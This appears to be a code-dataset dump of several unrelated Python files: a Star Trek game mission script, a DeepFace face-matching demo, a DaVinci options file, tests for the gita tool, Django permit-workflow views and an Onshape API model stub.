-1.55)\n\tpCardCapt = MissionLib.SetupCharacter(\"Bridge.Characters.CardCapt\", \"CardSet\")\n\tpCardCapt.SetHidden(1)\n\n\t\n\tpMission = MissionLib.GetMission()\n\tif (pMission == None):\n\t\treturn\n\tpMissionDatabase = 
pMission.SetDatabase(\"data/TGL/Maelstrom/Episode 2/E2M1.TGL\")\n\t\n\t# Do the SOS sequence.\n\tpSequence = App.TGSequence_Create()\n\t\n\tpBridge\t\t= App.g_kSetManager.GetSet(\"bridge\")\n\tpCardSet\t= App.g_kSetManager.GetSet(\"CardSet\")\n\t\n\tpSaffi\t\t= App.CharacterClass_GetObject(pBridge, \"XO\")\n\tpKiska\t\t= App.CharacterClass_GetObject(pBridge, \"Helm\")\n\tpCardCapt\t= App.CharacterClass_GetObject(pCardSet, \"CardCapt\")\n\t\n\tpKiskaSOS1\t\t= App.CharacterAction_Create(pKiska, App.CharacterAction.AT_SAY_LINE, \"E2M1SOS1\", None, 0, pMissionDatabase)\n\tpKiskaSOS2\t\t= App.CharacterAction_Create(pKiska, App.CharacterAction.AT_SAY_LINE, \"E2M1SOS2\", None, 0, pMissionDatabase)\n\tpKiskaSOS3\t\t= App.CharacterAction_Create(pKiska, App.CharacterAction.AT_SAY_LINE, \"E2M1SOS3\", \"Captain\", 1, pMissionDatabase)\n\tpCommOn\t\t\t= App.TGSoundAction_Create(\"ViewOn\")\n\tpCardCaptSOS5\t= App.TGScriptAction_Create(\"MissionLib\", \"SubtitledLine\", pMissionDatabase, \"E2M1SOS5\")\n\tpKiskaSOS6\t\t= App.CharacterAction_Create(pKiska, App.CharacterAction.AT_SAY_LINE, \"E2M1SOS6\", \"Captain\", 1, pMissionDatabase)\n\tpSaffiSOS4\t\t= App.CharacterAction_Create(pSaffi, App.CharacterAction.AT_SAY_LINE, \"E2M1SOS4\", None, 0, pMissionDatabase)\n\tpCardViewOn\t\t= App.TGScriptAction_Create(\"MissionLib\", \"ViewscreenOn\", \"CardSet\", \"CardCapt\")\n\tpCardCaptSOS8\t= App.CharacterAction_Create(pCardCapt, App.CharacterAction.AT_SAY_LINE, \"E2M1SOS8\", None, 0, pMissionDatabase)\n\tpCardCaptSOS9\t= App.CharacterAction_Create(pCardCapt, App.CharacterAction.AT_SAY_LINE, \"E2M1SOS9\", None, 0, pMissionDatabase)\n\tpCardCaptSOS10\t= App.CharacterAction_Create(pCardCapt, App.CharacterAction.AT_SAY_LINE, \"E2M1SOS10\", None, 0, pMissionDatabase)\n\tpSaffiSOS11\t\t= App.CharacterAction_Create(pSaffi, App.CharacterAction.AT_SAY_LINE, \"E2M1SOS11\", None, 0, pMissionDatabase)\n\tpCardCaptSOS12\t= App.CharacterAction_Create(pCardCapt, App.CharacterAction.AT_SAY_LINE, \"E2M1SOS12\", None, 0, pMissionDatabase)\n\tpViewOff\t\t= App.TGScriptAction_Create(\"MissionLib\", \"ViewscreenOff\")\n\tpKiskaSOS13\t\t= App.CharacterAction_Create(pKiska, App.CharacterAction.AT_SAY_LINE, \"E2M1SOS13\", \"Captain\",0, pMissionDatabase)\n\t\n\t\n\tpSequence.AppendAction(pKiskaSOS1)\n\tpSequence.AppendAction(pKiskaSOS2)\n\tpSequence.AppendAction(pKiskaSOS3)\n\tpSequence.AppendAction(pCommOn)\n\tpSequence.AppendAction(pCardCaptSOS5)\n\tpSequence.AppendAction(pKiskaSOS6)\n\tpSequence.AppendAction(pSaffiSOS4)\n\tpSequence.AppendAction(pCardViewOn)\n\tpSequence.AppendAction(pCardCaptSOS8)\n\tpSequence.AppendAction(pCardCaptSOS9)\n\tpSequence.AppendAction(pCardCaptSOS10)\n\tpSequence.AppendAction(pSaffiSOS11)\n\tpSequence.AppendAction(pCardCaptSOS12)\n\tpSequence.AppendAction(pViewOff)\n\tpSequence.AppendAction(pKiskaSOS13)\n\t\n\tpSequence.Play()\n\n\t# Get the Episode and register our Aid Krell Goal\n\t# Remove the SupplyGeki goal if it's still there\n\tMissionLib.AddGoal(\"E2AidKrellGoal\")\n\n################################################################################\n##\tE2M3Briefing()\n##\n##\tPlays the briefing and links us to Episode 2 Mission 3.\n##\n##\tArgs:\tNone\n##\n##\tReturn:\tNone\n################################################################################\ndef E2M3Briefing():\n#\tkDebugObj.Print(\"Starting E2M3\")\n\t# Set the TGL for the mission and load the sounds\n\t# that we need.\n\tpMission = MissionLib.GetMission()\n\tif (pMission == None):\n\t\treturn\n\tpMissionDatabase = 
pMission.SetDatabase(\"data/TGL/Maelstrom/Episode 2/E2M3.TGL\")\n\t\t\n\t# Do our intro sequence\n\tpBridge\t\t= App.g_kSetManager.GetSet(\"bridge\")\n\tpStarbase\t= App.g_kSetManager.GetSet(\"StarbaseSet\")\n\t\n\tpFelix\t= App.CharacterClass_GetObject(pBridge, \"Tactical\")\n\tpLiu\t= App.CharacterClass_GetObject(pStarbase, \"Liu\")\n\t\n\tpSequence = App.TGSequence_Create()\n\t\n\tpFelixLine027\t= App.CharacterAction_Create(pFelix, App.CharacterAction.AT_SAY_LINE, \"E2M3Briefing1\", \"Captain\", 1, pMissionDatabase)\n\tpStarbaseViewOn\t= App.TGScriptAction_Create(\"MissionLib\", \"ViewscreenOn\", \"StarbaseSet\", \"Liu\")\n\tpLiuLine028\t\t= App.CharacterAction_Create(pLiu, App.CharacterAction.AT_SAY_LINE, \"E2M3Briefing2\", None, 0, pMissionDatabase)\n\tpLiuLine029\t\t= App.CharacterAction_Create(pLiu, App.CharacterAction.AT_SAY_LINE, \"E2M3Briefing3\", None, 0, pMissionDatabase)\n\tpLiuLine030\t\t= App.CharacterAction_Create(pLiu, App.CharacterAction.AT_SAY_LINE, \"E2M3Briefing4\", None, 0, pMissionDatabase)\n\tpLiuLine031\t\t= App.CharacterAction_Create(pLiu, App.CharacterAction.AT_SAY_LINE, \"E2M3Briefing5\", None, 0, pMissionDatabase)\n\tpViewOff\t\t= App.TGScriptAction_Create(\"MissionLib\", \"ViewscreenOff\")\n\t\n\tpSequence.AddAction(pFelixLine027)\n\tpSequence.AddAction(pStarbaseViewOn, pFelixLine027)\n\tpSequence.AddAction(pLiuLine028, pStarbaseViewOn)\n\tpSequence.AddAction(pLiuLine029, pLiuLine028)\n\tpSequence.AddAction(pLiuLine030, pLiuLine029)\n\tpSequence.AddAction(pLiuLine031, pLiuLine030)\n\tpSequence.AddAction(pViewOff, pLiuLine031)\n\t\n\tpSequence.Play()\n\t\n\t# Link the warp button to the new menu\n\timport Systems.Vesuvi.Vesuvi\n\tpVesuviMenu = Systems.Vesuvi.Vesuvi.CreateMenus()\n\n\t# Set the mission name for the button\n\tpVesuviMenu.SetMissionName(\"Maelstrom.Episode2.E2M3.E2M3\")\n\n\t# Remove our goal to Supply Vesuvi 5 and add the \n\t# Head to Vesuvi 6 goal\n\tMissionLib.RemoveGoal(\"E2SupplyCeli5Goal\")\n\tMissionLib.AddGoal(\"E2HeadToCeli6Goal\")\n\n################################################################################\n##\tSetupMusic\n##\n##\tSet the music to this episode's music.\n##\n##\tArgs:\tNone\n##\n##\tReturn:\tNone\n################################################################################\ndef SetupMusic():\n\timport DynamicMusic\n\tDynamicMusic.ChangeMusic(\n\t\t# Base songs/fanfares to use as music...\n\t\t((\"sfx/Music/Episode 2.mp3\", \"Starting Ambient\"),\n\t\t(\"sfx/Music/Starbase12.mp3\", \"Starbase12 Ambient\"),\n\t\t(\"sfx/Music/Nebula 1.mp3\", \"Nebula Ambient\"),\n\t\t(\"sfx/Music/Cutscene_Generic.mp3\", \"Generic Cutscene\"),\n\t\t(\"sfx/Music/EpisGen1.mp3\", \"Generic Episode 1\"),\n\t\t(\"sfx/Music/EpisGen2.mp3\", \"Generic Episode 2\"),\n\t\t(\"sfx/Music/EpisGen3.mp3\", \"Generic Episode 3\"),\n\t\t(\"sfx/Music/Panic-9a.mp3\", \"Cbt Panic 1\"),\n\t\t(\"sfx/Music/Panic-9b.mp3\", \"Cbt Panic 2\"),\n\t\t(\"sfx/Music/Panic-9c.mp3\", \"Cbt Panic 3\"),\n\t\t(\"sfx/Music/Panic-9d.mp3\", \"Cbt Panic 4\"),\n\t\t(\"sfx/Music/Panic-9e.mp3\", \"Cbt Panic 5\"),\n\t\t(\"sfx/Music/Panic-9f.mp3\", \"Cbt Panic 6\"),\n\t\t(\"sfx/Music/Panic-9g.mp3\", \"Cbt Panic 7\"),\n\t\t(\"sfx/Music/Neutral-10i.mp3\", \"Cbt Neutral 1\"),\n\t\t(\"sfx/Music/Neutral-10b.mp3\", \"Cbt Neutral 2\"),\n\t\t(\"sfx/Music/Neutral-10c.mp3\", \"Cbt Neutral 3\"),\n\t\t(\"sfx/Music/Neutral-10d.mp3\", \"Cbt Neutral 4\"),\n\t\t(\"sfx/Music/Neutral-10e.mp3\", \"Cbt Neutral 5\"),\n\t\t(\"sfx/Music/Neutral-10f.mp3\", \"Cbt Neutral 
6\"),\n\t\t(\"sfx/Music/Neutral-10g.mp3\", \"Cbt Neutral 7\"),\n\t\t(\"sfx/Music/Neutral-10h.mp3\", \"Cbt Neutral 8\"),\n\t\t(\"sfx/Music/Neutral-10a.mp3\", \"Cbt Neutral 9\"),\n\t\t(\"sfx/Music/Confident-11a.mp3\", \"Cbt Confident 1\"),\n\t\t(\"sfx/Music/Confident-11b.mp3\", \"Cbt Confident 2\"),\n\t\t(\"sfx/Music/Confident-11c.mp3\", \"Cbt Confident 3\"),\n\t\t(\"sfx/Music/Confident-11d.mp3\", \"Cbt Confident 4\"),\n\t\t(\"sfx/Music/Confident-11e.mp3\", \"Cbt Confident 5\"),\n\t\t(\"sfx/Music/Confident-11f.mp3\", \"Cbt Confident 6\"),\n\t\t(\"sfx/Music/Confident-11g.mp3\", \"Cbt Confident 7\")),\n\t\t# Which music to use as a transition between 2\n\t\t# other pieces.\n\t\t(),\n\t\t# Special music states which are collections of\n\t\t# pieces of music, played in random order.\n\t\t((\"Combat Panic\", (\"Cbt Panic 1\",\n\t\t\t\t\"Cbt Panic 2\",\n\t\t\t\t\"Cbt Panic 3\",\n\t\t\t\t\"Cbt Panic 4\",\n\t\t\t\t\"Cbt Panic 5\",\n\t\t\t\t\"Cbt Panic 6\",\n\t\t\t\t\"Cbt Panic 7\")),\n\t\t(\"Combat Neutral\", (\"Cbt Neutral 1\",\n\t\t\t\t\"Cbt Neutral 2\",\n\t\t\t\t\"Cbt Neutral 3\",\n\t\t\t\t\"Cbt Neutral 4\",\n\t\t\t\t\"Cbt Neutral 5\",\n\t\t\t\t\"Cbt Neutral 6\",\n\t\t\t\t\"Cbt Neutral 7\",\n\t\t\t\t\"Cbt Neutral 8\",\n\t\t\t\t\"Cbt Neutral 9\")),\n\t\t(\"Combat Confident\", (\"Cbt Confident 1\",\n\t\t\t\t\"Cbt Confident 2\",\n\t\t\t\t\"Cbt Confident 3\",\n\t\t\t\t\"Cbt Confident 4\",\n\t\t\t\t\"Cbt Confident 5\",\n\t\t\t\t\"Cbt Confident 6\",\n\t\t\t\t\"Cbt Confident 7\"))),\n\t\t# Which state machine to use.\n\t\tDynamicMusic.StandardCombatMusic)\n\n################################################################################\n##\tTerminate()\n##\n##\tCalled to terminate our episode.\n##\n##\tArgs:\tpEpisode\t- The episode level object.\n##\n##\tReturn:\tNone\n################################################################################\ndef Terminate(pEpisode):\n\t\"Called Terminate and de-activate an Episode\"\n\tpass\n","sub_path":"scripts/Maelstrom/Episode2/Episode2.py","file_name":"Episode2.py","file_ext":"py","file_size_in_byte":10679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"622258972","text":"from deepface import DeepFace\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\n\r\nimg1_path = \"test/a1.jpg\" #yüzünü tanımasını isteyeceğiniz kişi\r\nimg2_path = \"test/a2.jpg\" #yüzünü tanıtığınız 1.kişi\r\nimg3_path = \"test/a3.jpg\" #yüzünü tanıttığınız 2.kişi\r\nimg4_path = \"test/a4.jpg\" #yüzünü tanıttığınız 3.kişi\r\nimg1 = cv2.imread(img1_path)\r\nimg2 = cv2.imread(img2_path)\r\nimg3 = cv2.imread(img3_path)\r\nimg4 = cv2.imread(img4_path)\r\nplt.imshow(img1[:,:,::-1])\r\nplt.show()\r\n\r\nplt.imshow(img2[:,:,::-1])\r\nplt.show()\r\n\r\nplt.imshow(img3[:,:,::-1])\r\nplt.show()\r\n\r\nplt.imshow(img3[:,:,::-1])\r\nplt.show()\r\nresp = DeepFace.verify(img1,img2)\r\nresp1 = DeepFace.verify(img1,img3)\r\n\r\nprint(resp[\"verified\"])\r\nif resp[\"verified\"] == 1:\r\n print(\"Fotoğraftaki kişi Kemal Sunal\")\r\nelif resp1[\"verified\"] == 1:\r\n print(\"Fotoğraftaki kişi elon musk\")\r\nelse :\r\n print(\"Sonuç bulunamadı\")\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"325229587","text":"isTest = False\ntest = \"\"\nif isTest : test = \"Test\"\n\nimport os, sys\nroot = os.getenv(\"B2KTAUMUROOT\")\nif root is not None : \n sys.path.append(root+\"/Options\" 
)\nsys.path.append(os.getcwd())\n\nimport B2KTauMuOption as opt\nfrom DV_Config import ConfigDaVinci\n\nopt.setalgs()\nConfigDaVinci(\"CL\",16,opt.algs,Mag=test,RootInTES=\"Bhadron\",isTest=isTest)\n\n\n","sub_path":"Options/MyOption_DataBhadron.py","file_name":"MyOption_DataBhadron.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"286608874","text":"import pytest\nimport os\nfrom unittest.mock import patch, mock_open\n\nfrom gita import utils\n\nTEST_DIR = os.path.abspath(os.path.dirname(__file__))\nPATH_FNAME = os.path.join(TEST_DIR, 'mock_path_file')\nPATH_FNAME_EMPTY = os.path.join(TEST_DIR, 'empty_path_file')\nPATH_FNAME_CLASH = os.path.join(TEST_DIR, 'clash_path_file')\n\n\n@pytest.mark.parametrize('test_input, has_remote, expected', [\n ({\n 'abc': '/root/repo/'\n }, True, 'abc \\x1b[31mrepo *+_ \\x1b[0m msg'),\n ({\n 'repo': '/root/repo2/'\n }, False, 'repo \\x1b[37mrepo *+_ \\x1b[0m msg'),\n])\ndef test_describe(test_input, has_remote, expected, monkeypatch):\n monkeypatch.setattr(utils, 'get_head', lambda x: 'repo')\n monkeypatch.setattr(utils, 'has_remote', lambda: has_remote)\n monkeypatch.setattr(utils, 'get_commit_msg', lambda: \"msg\")\n monkeypatch.setattr(utils, 'has_untracked', lambda: True)\n monkeypatch.setattr('os.chdir', lambda x: None)\n # Returns of os.system determine the repo status\n monkeypatch.setattr('os.system', lambda x: True)\n print('expected: ', repr(expected))\n print('got: ', repr(next(utils.describe(test_input))))\n assert expected == next(utils.describe(test_input))\n\n\ndef test_get_head():\n with patch('builtins.open',\n mock_open(read_data='ref: refs/heads/snake')) as mock_file:\n head = utils.get_head('/fake')\n assert head == 'snake'\n mock_file.assert_called_once_with('/fake/.git/HEAD')\n\n\n@pytest.mark.parametrize('path_fname, expected', [\n (PATH_FNAME, {\n 'repo1': '/a/bcd/repo1',\n 'repo2': '/e/fgh/repo2'\n }),\n (PATH_FNAME_EMPTY, {}),\n (PATH_FNAME_CLASH, {\n 'repo1': '/a/bcd/repo1',\n 'repo2': '/e/fgh/repo2',\n 'x/repo1': '/root/x/repo1'\n }),\n])\n@patch('gita.utils.is_git', return_value=True)\n@patch('gita.utils.get_path_fname')\ndef test_get_repos(mock_path_fname, _, path_fname, expected):\n mock_path_fname.return_value = path_fname\n utils.get_repos.cache_clear()\n repos = utils.get_repos()\n assert repos == expected\n\n\n@pytest.mark.parametrize(\n 'path_input, expected',\n [\n (['/home/some/repo/'], '/home/some/repo:/nos/repo'), # add one new\n (['/home/some/repo1', '/repo2'],\n '/home/some/repo1:/nos/repo:/repo2'), # add two new\n (['/home/some/repo1', '/nos/repo'],\n '/home/some/repo1:/nos/repo'), # add one old one new\n ])\n@patch('os.path.expanduser', return_value='/root')\n@patch('os.makedirs')\n@patch('gita.utils.get_repos', return_value={'repo': '/nos/repo'})\n@patch('gita.utils.is_git', return_value=True)\ndef test_add_repos(_0, _1, _2, _3, path_input, expected):\n with patch('builtins.open', mock_open()) as mock_file:\n utils.add_repos(path_input)\n mock_file.assert_called_with('/root/.gita/repo_path', 'w')\n handle = mock_file()\n handle.write.assert_called_once_with(expected)\n","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"546810129","text":"from __future__ import unicode_literals\nfrom applications.workflow import Flow\nfrom .models import Location, Record, 
PublicationNewspaper, PublicationWebsite, PublicationFeedback,Referral,Application\nfrom django.utils.safestring import SafeText\nfrom django.contrib.auth.models import Group\nfrom applications.validationchecks import Attachment_Extension_Check\n\nclass Application_Part5():\n\n def get(self,app,self_view,context):\n request = self_view.request\n\n if app.routeid is None:\n app.routeid = 1\n\n flow = Flow()\n workflowtype = flow.getWorkFlowTypeFromApp(app)\n flow.get(workflowtype)\n context = flow.getAccessRights(request,context,app.routeid,workflowtype)\n context = flow.getCollapse(context,app.routeid,workflowtype)\n context = flow.getHiddenAreas(context,app.routeid,workflowtype)\n context['workflow'] = flow.getAllRouteConf(workflowtype,app.routeid)\n context['workflow_actions'] = flow.getAllRouteActions(app.routeid,workflowtype)\n context['formcomponent'] = flow.getFormComponent(app.routeid,workflowtype)\n context['workflowoptions'] = flow.getWorkflowOptions()\n\n try:\n LocObj = Location.objects.get(application_id=self_view.object.id)\n context['certificate_of_title_volume'] = LocObj.title_volume\n context['folio'] = LocObj.folio\n context['diagram_plan_deposit_number'] = LocObj.dpd_number\n context['location'] = LocObj.location\n context['reserve_number'] = LocObj.reserve\n context['street_number_and_name'] = LocObj.street_number_name\n context['town_suburb'] = LocObj.suburb\n context['lot'] = LocObj.lot\n context['nearest_road_intersection'] = LocObj.intersection\n except:\n donothing = ''\n\n context['publication_newspaper'] = PublicationNewspaper.objects.filter(application_id=self_view.object)\n context['publication_website'] = PublicationWebsite.objects.filter(application_id=self_view.object)\n if self_view.object.river_lease_scan_of_application:\n context['river_lease_scan_of_application_short'] = SafeText(self_view.object.river_lease_scan_of_application.upload.name)[19:]\n\n if self_view.object.document_draft:\n context['document_draft_short'] = SafeText(self_view.object.document_draft.upload.name)[19:]\n if self_view.object.document_final:\n context['document_final_short'] = SafeText(self_view.object.document_final.upload.name)[19:]\n if self_view.object.deed:\n context['deed_short'] = SafeText(self_view.object.deed.upload.name)[19:]\n\n\n context['land_owner_consent_list'] = []\n landoc = app.land_owner_consent.all()\n for doc in landoc:\n fileitem = {}\n fileitem['fileid'] = doc.id\n fileitem['path'] = doc.upload.name\n fileitem['path_short'] = SafeText(doc.upload.name)[19:]\n context['land_owner_consent_list'].append(fileitem)\n\n\n context['publication_newspaper_list'] = []\n pub_news_obj = []\n pub_news_mod = PublicationNewspaper.objects.filter(application_id=self_view.object)\n for pubrow in pub_news_mod:\n rowitem = {}\n rowitem['pk'] = pubrow.pk\n rowitem['id'] = pubrow.id\n rowitem['date'] = pubrow.date\n rowitem['newspaper'] = pubrow.newspaper\n rowitem['application'] = pubrow.application\n rowitem['records'] = pubrow.records\n rowitem['documents_short'] = []\n records = pubrow.records.all()\n for doc in records:\n fileitem = {}\n fileitem['fileid'] = doc.id\n fileitem['path'] = doc.upload\n fileitem['path_short'] = SafeText(doc.upload.name)[19:]\n rowitem['documents_short'].append(fileitem)\n context['publication_newspaper_list'].append(rowitem)\n\n\n pub_feed_obj = []\n pub_feed_mod = PublicationFeedback.objects.filter(application_id=self_view.object)\n for pubrow in pub_feed_mod:\n rowitem = {}\n rowitem['id'] = pubrow.id\n rowitem['name'] = pubrow.name\n 
rowitem['address'] = pubrow.address\n rowitem['suburb'] = pubrow.suburb\n rowitem['state'] = pubrow.state\n rowitem['postcode'] = pubrow.postcode\n rowitem['phone'] = pubrow.phone\n rowitem['email'] = pubrow.email\n rowitem['comments'] = pubrow.comments\n rowitem['records'] = pubrow.records\n rowitem['documents_short'] = [] # needed so we can add documents to list\n rowitem['status'] = pubrow.status\n rowitem['application'] = pubrow.application\n records = pubrow.records.all()\n for doc in records:\n fileitem = {}\n fileitem['fileid'] = doc.id\n fileitem['path'] = doc.upload\n fileitem['path_short'] = SafeText(doc.upload.name)[19:]\n rowitem['documents_short'].append(fileitem)\n pub_feed_obj.append(rowitem)\n\n context['publication_feedback'] = pub_feed_obj\n\n new_documents_to_publish = {}\n pub_web = PublicationWebsite.objects.filter(application_id=self_view.object.id)\n for pub_doc in pub_web:\n if pub_doc.published_document_id:\n doc = Record.objects.get(id=pub_doc.published_document_id)\n fileitem = {}\n fileitem['fileid'] = doc.id\n fileitem['path'] = doc.upload.name\n new_documents_to_publish[pub_doc.original_document_id] = fileitem\n\n orignaldoclist = []\n if self_view.object.river_lease_scan_of_application:\n fileitem = {}\n fileitem['fileid'] = self_view.object.river_lease_scan_of_application.id\n fileitem['path'] = self_view.object.river_lease_scan_of_application.upload.name\n fileitem['path_short'] = SafeText(self_view.object.river_lease_scan_of_application.upload.name)[19:]\n fileitem['group_name'] = \"River Lease Scan of Application\"\n if self_view.object.river_lease_scan_of_application.id in new_documents_to_publish:\n fileitem['publish_doc'] = new_documents_to_publish[self_view.object.river_lease_scan_of_application.id]['path']\n fileitem['publish_doc_short'] = SafeText(new_documents_to_publish[self_view.object.river_lease_scan_of_application.id]['path'])[19:]\n orignaldoclist.append(fileitem)\n\n if self_view.object.deed:\n fileitem = {}\n fileitem['fileid'] = self_view.object.deed.id\n fileitem['path'] = self_view.object.deed.upload.name\n fileitem['path_short'] = SafeText(self_view.object.deed.upload.name)[19:]\n fileitem['group_name'] = \"Deed\"\n if self_view.object.deed.id in new_documents_to_publish:\n fileitem['publish_doc'] = new_documents_to_publish[self_view.object.deed.id]['path']\n fileitem['publish_doc_short'] = SafeText(new_documents_to_publish[self_view.object.deed.id]['path'])[19:]\n orignaldoclist.append(fileitem)\n\n landoc = app.land_owner_consent.all()\n for doc in landoc:\n fileitem = {}\n fileitem['fileid'] = doc.id\n fileitem['path'] = doc.upload.name\n fileitem['path_short'] = SafeText(doc.upload.name)[19:]\n fileitem['group_name'] = \"Land Owner Consent\"\n if doc.id in new_documents_to_publish:\n fileitem['publish_doc'] = new_documents_to_publish[doc.id]['path']\n fileitem['publish_doc_short'] = SafeText(new_documents_to_publish[doc.id]['path'])[19:]\n else:\n fileitem['publish_doc'] = \"\"\n fileitem['publish_doc_short'] = \"\"\n\n orignaldoclist.append(fileitem)\n\n doclist = app.proposed_development_plans.all()\n for doc in doclist:\n fileitem = {}\n fileitem['fileid'] = doc.id\n fileitem['path'] = doc.upload.name\n fileitem['path_short'] = SafeText(doc.upload.name)[19:]\n fileitem['group_name'] = \"Proposed Development Plans\"\n\n if doc.id in new_documents_to_publish:\n fileitem['publish_doc'] = new_documents_to_publish[doc.id]['path']\n fileitem['publish_doc_short'] = SafeText(new_documents_to_publish[doc.id]['path'])[19:]\n else:\n 
fileitem['publish_doc'] = \"\"\n fileitem['publish_doc_short'] = \"\"\n orignaldoclist.append(fileitem)\n context['original_document_list'] = orignaldoclist\n\n doclist = app.proposed_development_plans.all()\n context['proposed_development_plans_list'] = []\n for doc in doclist:\n fileitem = {}\n fileitem['fileid'] = doc.id\n fileitem['path'] = doc.upload.name\n fileitem['path_short'] = SafeText(doc.upload.name)[19:]\n context['proposed_development_plans_list'].append(fileitem)\n\n return context\n\n\nclass Application_Emergency():\n\n def get(self,app,self_view,context):\n request = self_view.request\n workflowtype = \"emergency\"\n\n if app.routeid is None:\n app.routeid = 1\n\n flow = Flow()\n flow.get(workflowtype)\n context = flow.getAccessRights(request,context,app.routeid,workflowtype)\n context = flow.getCollapse(context,app.routeid,workflowtype)\n context = flow.getHiddenAreas(context,app.routeid,workflowtype)\n context['workflow_actions'] = flow.getAllRouteActions(app.routeid,workflowtype)\n context['formcomponent'] = flow.getFormComponent(app.routeid,workflowtype)\n context['workflowoptions'] = flow.getWorkflowOptions()\n\n if app.organisation:\n context['address'] = app.organisation.postal_address\n elif app.applicant:\n context['address'] = app.applicant.postal_address\n\n return context\n\nclass Application_Permit():\n def get(self,app,self_view,context):\n request = self_view.request\n workflowtype = \"permit\"\n\n if app.routeid is None:\n app.routeid = 1\n\n flow = Flow()\n flow.get(workflowtype)\n context = flow.getAccessRights(request,context,app.routeid,workflowtype)\n context = flow.getCollapse(context,app.routeid,workflowtype)\n context = flow.getHiddenAreas(context,app.routeid,workflowtype)\n context['workflow_actions'] = flow.getAllRouteActions(app.routeid,workflowtype)\n context['formcomponent'] = flow.getFormComponent(app.routeid,workflowtype)\n context['workflowoptions'] = flow.getWorkflowOptions()\n\n return context\n\nclass Application_Licence():\n def get(self,app,self_view,context):\n request = self_view.request\n workflowtype = \"licence\"\n\n if app.routeid is None:\n app.routeid = 1\n\n flow = Flow()\n flow.get(workflowtype)\n context = flow.getAccessRights(request,context,app.routeid,workflowtype)\n context = flow.getCollapse(context,app.routeid,workflowtype)\n context = flow.getHiddenAreas(context,app.routeid,workflowtype)\n context['workflow_actions'] = flow.getAllRouteActions(app.routeid,workflowtype)\n context['formcomponent'] = flow.getFormComponent(app.routeid,workflowtype)\n context['workflowoptions'] = flow.getWorkflowOptions()\n\n return context\n\n\nclass Referrals_Next_Action_Check():\n\n def get(self,app):\n app_refs = Referral.objects.filter(application=app)\n# print app_refs\n referralscompleted = True\n for ref in app_refs:\n if ref.status == Referral.REFERRAL_STATUS_CHOICES.referred:\n referralscompleted = False\n\n return referralscompleted\n\n def go_next_action(self,app):\n app = Application.objects.get(id=app.id)\n app.status = ''\n flow = Flow()\n workflowtype = flow.getWorkFlowTypeFromApp(app)\n DefaultGroups = flow.groupList()\n flow.get(workflowtype)\n assignee = None\n routes = flow.getAllRouteActions(app.routeid,workflowtype)\n action = routes[0]['routegroup']\n if action in DefaultGroups['grouplink']:\n groupassignment = Group.objects.get(name=DefaultGroups['grouplink'][action])\n else:\n groupassignment = None\n route = flow.getNextRouteObj(action,app.routeid,workflowtype)\n\n if \"route\"in route:\n app.routeid = 
route[\"route\"]\n else:\n app.routeid = None\n\n if \"state\" in route:\n app.state = route[\"state\"]\n else:\n app.state = 0 \n\n app.group = groupassignment\n app.assignee = assignee\n app.save()\n\n\n\n\n","sub_path":"applications/views_sub.py","file_name":"views_sub.py","file_ext":"py","file_size_in_byte":12920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"463172152","text":"# coding: utf-8\n\n\"\"\"\n Onshape REST API\n\n The Onshape REST API consumed by all clients. # noqa: E501\n\n The version of the OpenAPI document: 1.113\n Contact: api-support@onshape.zendesk.com\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nfrom __future__ import absolute_import\nimport re # noqa: F401\nimport sys # noqa: F401\n\nimport six # noqa: F401\nimport nulltype # noqa: F401\n\nfrom onshape_client.oas.model_utils import ( # noqa: F401\n ModelComposed,\n ModelNormal,\n ModelSimple,\n date,\n datetime,\n file_type,\n int,\n none_type,\n str,\n validate_get_composed_info,\n)\n\ntry:\n from onshape_client.oas.models import btfs_value_array1499\nexcept ImportError:\n btfs_value_array1499 = sys.modules[\"onshape_client.oas.models.btfs_value_array1499\"]\ntry:\n from onshape_client.oas.models import btfs_value_boolean1195\nexcept ImportError:\n btfs_value_boolean1195 = sys.modules[\n \"onshape_client.oas.models.btfs_value_boolean1195\"\n ]\ntry:\n from onshape_client.oas.models import btfs_value_map2062\nexcept ImportError:\n btfs_value_map2062 = sys.modules[\"onshape_client.oas.models.btfs_value_map2062\"]\ntry:\n from onshape_client.oas.models import btfs_value_number772\nexcept ImportError:\n btfs_value_number772 = sys.modules[\"onshape_client.oas.models.btfs_value_number772\"]\ntry:\n from onshape_client.oas.models import btfs_value_other1124\nexcept ImportError:\n btfs_value_other1124 = sys.modules[\"onshape_client.oas.models.btfs_value_other1124\"]\ntry:\n from onshape_client.oas.models import btfs_value_string1422\nexcept ImportError:\n btfs_value_string1422 = sys.modules[\n \"onshape_client.oas.models.btfs_value_string1422\"\n ]\ntry:\n from onshape_client.oas.models import btfs_value_too_big1247\nexcept ImportError:\n btfs_value_too_big1247 = sys.modules[\n \"onshape_client.oas.models.btfs_value_too_big1247\"\n ]\ntry:\n from onshape_client.oas.models import btfs_value_undefined2003\nexcept ImportError:\n btfs_value_undefined2003 = sys.modules[\n \"onshape_client.oas.models.btfs_value_undefined2003\"\n ]\ntry:\n from onshape_client.oas.models import btfs_value_with_units1817\nexcept ImportError:\n btfs_value_with_units1817 = sys.modules[\n \"onshape_client.oas.models.btfs_value_with_units1817\"\n ]\n\n\nclass BTFSValue1888(ModelNormal):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n\n Attributes:\n allowed_values (dict): The key is the tuple path to the attribute\n and the for var_name this is (var_name,). The value is a dict\n with a capitalized key describing the allowed value and an allowed\n value. These dicts store the allowed enum values.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n discriminator_value_class_map (dict): A dict to go from the discriminator\n variable value to the discriminator class name.\n validations (dict): The key is the tuple path to the attribute\n and the for var_name this is (var_name,). 
